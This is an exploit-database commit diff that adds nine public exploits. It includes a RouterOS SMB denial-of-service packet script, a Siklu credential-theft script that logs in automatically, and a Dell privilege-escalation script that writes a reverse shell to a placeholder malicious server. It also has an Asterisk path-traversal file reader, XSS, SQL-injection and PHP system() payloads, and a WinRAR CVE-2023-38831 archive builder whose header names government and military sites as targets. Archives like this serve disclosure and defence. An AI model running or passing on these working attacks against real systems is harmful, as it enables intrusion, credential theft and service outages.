DB: 2024-03-29

10 changes to exploits/shellcodes/ghdb

RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 - Denial of Service

Siklu MultiHaul TG series < 2.0.0 - unauthenticated credential disclosure

Dell Security Management Server <1.9.0 - Local Privilege Escalation

Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)

Broken Access Control - on NodeBB v3.6.7

liveSite Version 2019.1 - Remote Code Execution

Purei CMS 1.0 - SQL Injection

Workout Journal App 1.0 - Stored XSS

WinRAR version 6.22 - Remote Code Execution via ZIP archive

exploits/hardware/dos/51931.py

@@ -0,0 +1,97 @@
+# Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS
+# Google Dork: N/A
+# Date: 03/04/2024
+# Exploit Author: ice-wzl, Solstice Cyber Solutions
+# Vendor Homepage: https://mikrotik.com/
+# Software Link: https://mikrotik.com/download/archive
+# Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10
+# Tested on: RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10
+# CVE : CVE-2024-27686
+#!/usr/bin/python3
+# Founded by ice-wzl in conjunction with Solstice Cyber Solutions
+import argparse
+import sys
+import socket
+# Define the packets
+
+# the packet that causes crash 6.40.5 - 6.42.3
+fuzzed_packet_6 = b'\x00\x00\x00n\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x03\x00\xf1\x1f\x08\x00\x00\x00\x00\x00\x00\xe1\xbe\x82\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00G\xe5\x07\xf5\x07\xec\x01u\xe4Q]\x9e\xea\xedn\xa9\t\x00\x00\x00H\x00&\x00\\\x00\\\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x007\x007\x00\\\x00p\x00u\x00b\x00'
+
+
+packet_0 = b'\x00\x00\x00\xea\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00\xe8\xe4*\x99\xc9\xeb\xb6E\xa2A\xe9(\xee%\xe5\xdfp\x00\x00\x00\x04\x00\x00\x00\x02\x02\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00_\xf7m\xf2h*\x8f\x8ae\x0f8+T=Na8_\x0b@C\x82\xe7\x87\xc3qZ\xd7\xcf0M\x87\x00\x00\x02\x00\n\x00\x00\x00\x00\x00\x04\x00\x02\x00\x01\x00\x04\x00\x03\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x00\x00\x03\x00\x02\x00\x01\x00\x00\x00\x05\x00\x1a\x00\x00\x00\x00\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x008\x004\x00'
+packet_2_fuzzed = b'\x00\x00\x00\xa2\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00X\x00J\x00\x00\x00\x00\x00\x00\x00\x00\x00`H\x05\x06+\x06\x01\x05\x05\x02\xa0>0<\xa0\x0e21540373\xed\xba\xad211\x0c\x06\n+\x06\x01\x04\x01\x82294517887446830\x02\x02\n\xa2*\x04(NTLMSSP\x00\x01\x00\x00\x00\x15\x82\x08b\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x06\x01\x00\x00\x00\x00\x00\x0f'
+
+
+def open_connection(ip, port):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        s.connect((ip, port))
+        return s
+    except ConnectionRefusedError:
+        print(f"[!] Connection Refused on: {ip} {port}")
+        sys.exit(2)
+
+def send_payload_high(s):
+    s.send(packet_0)
+    s.send(packet_2_fuzzed)
+    s.close()
+
+def send_payload_low(s):
+    s.send(fuzzed_packet_6)
+    s.close()
+
+def verify_input(user_inp):
+    try:
+        user_inp = int(user_inp)
+        if user_inp > 2 or user_inp < 1:
+            return 3
+        else:
+            return user_inp
+    except ValueError:
+        return 0
+
+if __name__ == '__main__':
+
+    parser = argparse.ArgumentParser(prog='SMB Crash',
+        description='Crashes Mikrotik RouterOS SMB Service 6.40.5 - 6.49.10',
+        epilog='Discovered by: ice-wzl')
+
+    parser.add_argument("-t", "--target", action="store", dest="target")
+    parser.add_argument("-p", "--port", action="store", dest="port")
+
+    args = parser.parse_args()
+
+    if not args.target or not args.port:
+        print(f"[+] python3 {sys.argv[0]} --help")
+        sys.exit(1)
+
+    print("[+] What version is the target:\n\t[1] 6.40.5 - 6.44\n\t[2] 6.48.1 - 6.49.10\nEnter 1 or 2:")
+    version_choice = input("--> ")
+
+    if verify_input(version_choice) == 0:
+        print("Please enter a number...")
+        sys.exit(3)
+    elif verify_input(version_choice) == 3:
+        print("Please enter a number between 1 and 2")
+        sys.exit(4)
+
+    if verify_input(version_choice) == 1:
+        if args.port:
+            get_connect = open_connection(args.target, int(args.port))
+            send_payload_low(get_connect)
+            print(f"[+] Sent DOS to {args.target} on {args.port}")
+        else:
+            get_connect = open_connection(args.target, 445)
+            send_payload_low(get_connect)
+            print(f"[+] Sent DOS to {args.target} on 445")
+
+    if verify_input(version_choice) == 2:
+        if args.port:
+            get_connect = open_connection(args.target, int(args.port))
+            send_payload_high(get_connect)
+            print(f"[+] Sent DOS to {args.target} on {args.port}")
+
+        else:
+            get_connect = open_connection(args.target, 445)
+            send_payload_high(get_connect)
+            print(f"[+] Sent DOS to {args.target} on 445")

exploits/hardware/remote/51932.py

@@ -0,0 +1,46 @@
+# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure
+# Date: 28-02-2024
+# Exploit Author: semaja2
+# Vendor Homepage: https://siklu.com/
+# Software Link: https://partners.siklu.com/home/frontdoor
+# Version: < 2.0.0
+# Tested on: 2.0.0
+# CVE : None assigned
+#
+# Instructions
+# 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device
+# `ping6 -I en7 -c 2 ff02::1`
+# 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address
+# `ip -6 neigh show dev en7`
+# 3. Execute script
+# `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`
+# 4. Enjoy the access
+
+
+
+import socket
+import sys
+import os
+
+address = str(sys.argv[1])  # the target
+port = 12777
+
+# Captured command, sends "GetCredentials" to obtain random generated username/password
+cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")
+
+addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)
+(family, socktype, proto, canonname, sockaddr) = addrinfo[0]
+s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
+s.connect(sockaddr)
+s.send(cmd)
+data = s.recv(200)
+s.close()
+output = "".join(map(chr, data))
+
+# Split output, then remove trailing noise as string length is always 35
+splits = output.split('#')
+username = splits[1][slice(0, 35, 1)]
+password = splits[2][slice(0, 35, 1)]
+print('Username: ', username)
+print('Password: ', password)
+os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))

exploits/linux/local/51934.sh

@@ -0,0 +1,26 @@
+# Exploit Title: [title] Dell Security Management Server versions prior to
+11.9.0
+# Exploit Author: [author] Amirhossein Bahramizadeh
+# CVE : [if applicable] CVE-2023-32479
+Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security
+Management
+Server versions prior to 11.9.0 contain privilege escalation vulnerability
+due to improper ACL of the non-default installation directory. A local
+malicious user could potentially exploit this vulnerability by replacing
+binaries in installed directory and taking the reverse shell of the system
+leading to Privilege Escalation.
+
+#!/bin/bash
+
+INSTALL_DIR="/opt/dell"
+
+# Check if the installed directory has improper ACLs
+if [ -w "$INSTALL_DIR" ]; then
+    # Replace a binary in the installed directory with a malicious binary that opens a reverse shell
+    echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"
+    echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"
+    chmod +x "$INSTALL_DIR/dell-exploit"
+
+    # Wait for the reverse shell to connect to your malicious server
+    nc -lvnp 1234
+fi

exploits/multiple/remote/51927.py

@@ -0,0 +1,124 @@
+# Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)
+# Date: 2023-03-26
+# Exploit Author: Sean Pesce
+# Vendor Homepage: https://asterisk.org/
+# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/
+# Version: 18.20.0
+# Tested on: Debian Linux
+# CVE: CVE-2023-49294
+
+#!/usr/bin/env python3
+#
+# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that
+# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of
+# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar
+# to the common INI configuration format.
+#
+# References:
+#   https://nvd.nist.gov/vuln/detail/CVE-2023-49294
+#   https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f
+#   https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/
+
+
+import argparse
+import getpass
+import socket
+import sys
+
+
+CVE_ID = 'CVE-2023-49294'
+
+DEFAULT_PORT = 5038
+DEFAULT_FILE = '/etc/hosts'
+DEFAULT_ACTION_ID = 0
+DEFAULT_TCP_READ_SZ = 1048576  # 1MB
+
+
+
+def ami_msg(action, args, encoding='utf8'):
+    assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}'
+    assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}'
+    if 'ActionID' not in args:
+        args['ActionID'] = 0
+    line_sep = '\r\n'
+    data = f'Action: {action}{line_sep}'
+    for a in args:
+        data += f'{a}: {args[a]}{line_sep}'
+    data += line_sep
+    return data.encode(encoding)
+
+
+
+def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):
+    assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}'
+    sock.sendall(data)
+    resp = b''
+    while not resp.endswith(b'\r\n\r\n'):
+        resp += sock.recv(read_sz)
+    return resp
+
+
+
+if __name__ == '__main__':
+    # Parse command-line arguments
+    argparser = argparse.ArgumentParser()
+    argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server')
+    argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT)
+    argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True)
+    argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None)
+    argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE)
+    argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID)
+    if '-h' in sys.argv or '--help' in sys.argv:
+        print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr)
+        argparser.print_help()
+        sys.exit(0)
+    args = argparser.parse_args()
+
+    # Validate command-line arguments
+    assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
+    args.host = socket.gethostbyname(args.host)
+    if args.password is None:
+        args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')
+
+    print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
+    print(f'[INFO] Connecting to Asterisk AMI:  {args.user}@{args.host}:{args.port}', file=sys.stderr)
+
+    # Connect to the Asterisk AMI server
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    sock.connect((args.host, args.port))
+
+    # Read server banner
+    banner = sock.recv(DEFAULT_TCP_READ_SZ)
+    print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)
+
+    # Authenticate to the Asterisk AMI server
+    login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password})
+    login_resp = tcp_send_rcv(sock, login_msg)
+    while b'Authentication' not in login_resp:
+        login_resp = tcp_send_rcv(sock, b'')
+    if b'Authentication accepted' not in login_resp:
+        print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
+        sys.exit(1)
+    #print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
+    print(f'[INFO] Login success', file=sys.stderr)
+
+    # Obtain file data via path traversal
+    traversal = '../../../../../../../../'
+    cfg_msg = ami_msg('GetConfig', {
+        'ActionID': args.action_id,
+        'Filename': f'{traversal}{args.file}',
+        #'Category': 'default',
+        #'Filter': 'name_regex=value_regex,',
+    })
+    resp = tcp_send_rcv(sock, cfg_msg)
+    while b'Response' not in resp:
+        resp = tcp_send_rcv(sock, b'')
+
+    print(f'', file=sys.stderr)
+    print(f'{resp.decode("utf8")}')
+
+    if b'Error' in resp:
+        sys.exit(1)
+
+    pass  # Done

exploits/multiple/webapps/51930.txt

@@ -0,0 +1,37 @@
+Exploit Title: Broken Access Control - on NodeBB v3.6.7
+
+Date: 22/2/2024
+
+Exploit Author: Vibhor Sharma
+
+Vendor Homepage: https://nodebb.org/
+
+Version: 3.6.7
+
+Description:
+
+I identified a broken access control vulnerability in nodeBB v3.6.7,
+enabling attackers to access restricted information intended solely
+for administrators. Specifically, this data is accessible only to
+admins and not regular users. Through testing, I discovered that when
+a user accesses the group section of the application and intercepts
+the response for the corresponding request, certain attributes are
+provided in the JSON response. By manipulating these attributes, a
+user can gain access to tabs restricted to administrators. Upon
+reporting this issue, it was duly acknowledged and promptly resolved
+by the developers.
+
+
+
+Steps To Reproduce:
+1) User with the least previlages needs to neviagte to the group section.
+2) Intercept the response for the group requets.
+3) In the response modify the certian paramters : "
+*"system":0,"private":0,"isMember":true,"isPending":true,"isInvited":true,"isOwner":true,"isAdmin":true,
+**" *".
+4) Forward the request and we can see that attacker can access the
+restricted information.
+
+*Impact:*
+Attacker was able to access the restricted tabs for the Admin group
+which are only allowed the the administrators.

exploits/php/webapps/51928.txt

@@ -0,0 +1,162 @@
+# Exploit Title: Workout Journal App 1.0 - Stored XSS
+# Date: 12.01.2024
+# Exploit Author: MURAT CAGRI ALIS
+# Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html>
+# Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html
+# Version: 1.0
+# Tested on: Windows / MacOS / Linux
+# CVE : CVE-2024-24050
+
+# Description
+
+Install and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php url
+For the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code.
+
+
+# PoC
+
+Register Request to /workout-journal/endpoints/add-user.php
+
+POST /workout-journal/endpoint/add-user.php HTTP/1.1
+Host: localhost
+Content-Length: 268
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/workout-journal/index.php
+Accept-Encoding: gzip, deflate, br
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vci
+Connection: close
+
+first_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456-
+
+This request turn back 200 Code on Response
+
+HTTP/1.1 200 OK
+Date: Sat, 16 Mar 2024 02:05:52 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4
+X-Powered-By: PHP/8.1.4
+Content-Length: 214
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+                <script>
+                    alert('Account Registered Successfully!');
+                    window.location.href = 'http://localhost/workout-journal/';
+                </script>
+
+After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right.
+
+/workout-journal/home.php Request
+
+GET /workout-journal/home.php HTTP/1.1
+Host: localhost
+sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Dest: document
+Referer: http://localhost/workout-journal/endpoint/login.php
+Accept-Encoding: gzip, deflate, br
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1
+Connection: close
+
+/workout-journal/home.php Response
+
+HTTP/1.1 200 OK
+Date: Sat, 16 Mar 2024 02:07:56 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4
+X-Powered-By: PHP/8.1.4
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 2791
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+    <!DOCTYPE html>
+    <html lang="en">
+    <head>
+        <meta charset="UTF-8">
+        <meta name="viewport" content="width=device-width, initial-scale=1.0">
+        <title>Workout Journal App</title>
+
+        <!-- Style CSS -->
+        <link rel="stylesheet" href="./assets/style.css">
+
+        <!-- Bootstrap CSS -->
+        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">
+
+        <style>
+            body {
+                overflow: hidden;
+            }
+        </style>
+    </head>
+    <body>
+
+
+
+        <div class="main">
+            <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
+                <a class="navbar-brand ml-3" href="#">Workout Journal App</a>
+                <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
+                    <span class="navbar-toggler-icon"></span>
+                </button>
+
+                <div class="collapse navbar-collapse" id="navbarSupportedContent">
+                    <ul class="navbar-nav ml-auto">
+                    <li class="nav-item active">
+                        <a class="nav-link" href="./endpoint/logout.php">Log Out</a>
+                    </li>
+                </div>
+
+            </nav>
+
+            <div class="landing-page-container">
+                <div class="heading-container">
+                    <h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2>
+                    <p>What would you like to do today?</p>
+                </div>
+
+                <div class="select-option">
+                    <div class="read-journal" onclick="redirectToReadJournal()">
+                        <img src="./assets/read.jpg" alt="">
+                        <p>Read your past workout journals.</p>
+                    </div>
+                    <div class="write-journal" onclick="redirectToWriteJournal()">
+                        <img src="./assets/write.jpg" alt="">
+                        <p>Write your todays journal.</p>
+                    </div>
+                </div>
+            </div>
+
+        </div>
+
+        <!-- Bootstrap JS -->
+        <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>
+        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
+        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js"></script>
+
+        <!-- Script JS -->
+        <script src="./assets/script.js"></script>
+    </body>
+    </html>

exploits/php/webapps/51929.txt

@@ -0,0 +1,34 @@
+# Exploit Title: Purei CMS 1.0 - SQL Injection
+# Date: [27-03-2024]
+# Exploit Author: [Number 7]
+# Vendor Homepage: [purei.com]
+# Version: [1.0]
+# Tested on: [Linux]
+____________________________________________________________________________________
+
+Introduction:
+An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation
+of user input. Such an injection transpires when web applications accept user input directly inserted
+into an SQL statement without effectively filtering out hazardous characters.
+
+This could jeopardize the integrity of your database or reveal sensitive information.
+____________________________________________________________________________________
+
+Time-Based Blind SQL Injection:
+Vulnerable files:
+http://localhost/includes/getAllParks.php
+http://localhost/includes/getSearchMap.php
+
+make a POST request with the value of the am input set to :
+
+	if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
+
+make sure to url encode the inputs.
+SQL injection:
+Method: POST REQUEST
+
+Vunerable file:
+
+/includes/events-ajax.php?action=getMonth
+data for the POST req:
+month=3&type=&year=2024&cal_id=1[Inject Here]

exploits/php/webapps/51936.txt

@@ -0,0 +1,15 @@
+## Exploit Title: liveSite Version : 2019.1 Campaigns Remote Code Execution
+### Date: 2024-1-9
+### Exploit Author: tmrswrr
+### Category: Webapps
+### Vendor Homepage: https://livesite.com/
+### Version : 2019.1
+### Tested on: https://www.softaculous.com/apps/cms/liveSite
+
+1 ) Login with admin cred Click Campaigns  >  Create Campaign > Choose format Plain Text , write in body  your payload : https://127.0.0.1/liveSite/livesite/add_email_campaign.php
+
+    Payload : <?php echo system('cat /etc/passwd'); ?>
+
+2 ) After save you will be see result :
+
+    Result: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash pinguzo:x:992:992::/etc/pinguzo:/bin/false webuzo:x:987:987::/home/webuzo:/bin/bash apache:x:986:985::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

exploits/windows/remote/51935.c

@@ -0,0 +1,98 @@
+################################################################################################
+# Exploit Title :  EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 #
+# #
+# Author : E1.Coders #
+# #
+# Contact : E1.Coders [at] Mail [dot] RU #
+# #
+# Security Risk : High #
+# #
+# Description : All target's GOV & Military websites #
+# #
+################################################################################################
+# #
+# Expl0iTs: #
+ 
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "zip.h"
+#define PDF_FILE "document.pdf"
+#define FOLDER_NAME "document.pdf\\"
+#define SCRIPT_FILE "script.bat"
+#define ZIP_FILE "exploit.zip"
+ 
+int main(void) {
+    zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE);
+    if (zf == NULL) {
+        printf("Error opening ZIP file\n");
+        return -1;
+    }
+    zip_fileinfo zfi;
+    memset(&zfi, 0, sizeof(zfi));
+    if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
+        printf("Error adding PDF file to ZIP file\n");
+        zipClose(zf, NULL);
+        return -1;
+    }
+    FILE *fp = fopen(PDF_FILE, "rb");
+    if (fp == NULL) {
+        printf("Error opening PDF file\n");
+        zipCloseFileInZip(zf);
+        zipClose(zf, NULL);
+        return -1;
+    }
+    char buffer[1024];
+    int bytes_read;
+    while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) {
+        if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) {
+            printf("Error writing PDF file to ZIP file\n");
+            fclose(fp);
+            zipCloseFileInZip(zf);
+            zipClose(zf, NULL);
+            return -1;
+        }
+    }
+    fclose(fp);
+    zipCloseFileInZip(zf);
+    if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
+        printf("Error adding folder to ZIP file\n");
+        zipClose(zf, NULL);
+        return -1;
+    }
+    zipCloseFileInZip(zf);
+    char script_name[256];
+    sprintf(script_name, "%s%s", FOLDER_NAME, SCRIPT_FILE);
+    if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
+        printf("Error adding script file to ZIP file\n");
+        zipClose(zf, NULL);
+        return -1;
+    }
+    char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n";
+    if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) {
+        printf("Error writing script file to ZIP file\n");
+        zipCloseFileInZip(zf);
+        zipClose(zf, NULL);
+        return -1;
+    }
+    zipCloseFileInZip(zf);
+ 
+    zipClose(zf, NULL);
+ 
+    printf("ZIP file created successfully\n");
+    return 0;
+}
+
+https://nvd.nist.gov/vuln/detail/CVE-2023-38831
+https://nvd.nist.gov/vuln/detail/CVE-2023-38831
+https://github.com/HDCE-inc/CVE-2023-38831
+https://www.cvedetails.com/cve/CVE-2023-38831/
+https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/
+https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/CVE-2023-38831
+http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html
+https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/
+https://news.ycombinator.com/item?id=37236100
+https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/
+https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
+https://hdce.medium.com/cve-2023-38831-winrar-zero-day-poses-new-risks-for-traders-684911befad2
+ 

files_exploits.csv

@@ -3169,6 +3169,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 688,exploits/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer - ICMP Denial of Service",2004-12-15,x90c,dos,hardware,,2004-12-14,,1,OSVDB-12478,,,,,
 24839,exploits/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer - Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",dos,hardware,,2004-12-14,2013-03-18,1,,,,,,https://www.securityfocus.com/bid/11932/info
 51137,exploits/hardware/dos/51137.py,"Router ZTE-H108NS - Stack Buffer Overflow (DoS)",2023-03-30,"George Tsimpidas",dos,hardware,,2023-03-30,2023-03-30,0,,,,,,
+51931,exploits/hardware/dos/51931.py,"RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 - Denial of Service",2024-03-28,ice-wzl,dos,hardware,,2024-03-28,2024-03-28,0,,,,,,
